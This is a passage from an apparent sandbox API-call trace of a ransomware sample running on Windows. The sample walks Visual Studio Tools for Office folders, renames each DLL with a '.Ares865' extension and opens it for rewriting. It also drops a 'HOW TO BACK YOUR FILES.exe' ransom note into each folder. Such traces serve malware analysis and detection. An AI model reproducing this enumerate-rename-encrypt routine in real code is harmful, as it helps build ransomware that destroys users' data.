(x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.outlook.hostadapter.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.outlook.hostadapter.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.outlook.hostadapter.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41408) returned 1 [0148.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.386] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" [0148.386] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll") returned 62 [0148.386] lstrlenW (lpString="Ares865") returned 7 [0148.386] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll.Ares865") returned 160 [0148.386] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.word.hostadapter.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.word.hostadapter.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.word.hostadapter.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83896) returned 1 [0148.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.396] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" [0148.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3078 | out: hHeap=0x2b0000) returned 1 [0148.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0148.396] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned 82 [0148.396] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" [0148.396] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.396] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.397] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.397] GetLastError () returned 0x0 [0148.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.397] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.397] CloseHandle (hObject=0x120) returned 1 [0148.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.397] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.397] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52328bf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.398] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.398] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.398] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" [0148.398] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned 60 [0148.398] lstrlenW (lpString="Ares865") returned 7 [0148.398] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.398] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.Ares865") returned 151 [0148.398] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.400] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24496) returned 1 [0148.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.404] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" [0148.404] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll") returned 59 [0148.404] lstrlenW (lpString="Ares865") returned 7 [0148.404] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll.Ares865") returned 150 [0148.405] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22016) returned 1 [0148.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.411] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" [0148.411] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll") returned 54 [0148.411] lstrlenW (lpString="Ares865") returned 7 [0148.411] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.Ares865") returned 145 [0148.411] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23976) returned 1 [0148.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.417] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" [0148.418] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll") returned 53 [0148.418] lstrlenW (lpString="Ares865") returned 7 [0148.418] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.Ares865") returned 144 [0148.418] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.420] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49152) returned 1 [0148.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.425] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" [0148.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0148.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0148.426] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned 83 [0148.426] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" [0148.426] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.426] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.426] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.427] GetLastError () returned 0x0 [0148.427] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.427] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.427] CloseHandle (hObject=0x120) returned 1 [0148.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.427] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.427] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69acfbd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.427] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.427] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.428] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft.Office.Tools.v9.0.dll" | out: lpString1="Microsoft.Office.Tools.v9.0.dll") returned="Microsoft.Office.Tools.v9.0.dll" [0148.428] lstrlenW (lpString="Microsoft.Office.Tools.v9.0.dll") returned 31 [0148.428] lstrlenW (lpString="Ares865") returned 7 [0148.428] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.Ares865") returned 123 [0148.428] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0148.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.438] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" [0148.438] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll") returned 59 [0148.438] lstrlenW (lpString="Ares865") returned 7 [0148.438] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll.Ares865") returned 151 [0148.438] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32688) returned 1 [0148.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.446] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" [0148.446] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll") returned 58 [0148.446] lstrlenW (lpString="Ares865") returned 7 [0148.446] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.446] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.Ares865") returned 150 [0148.446] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 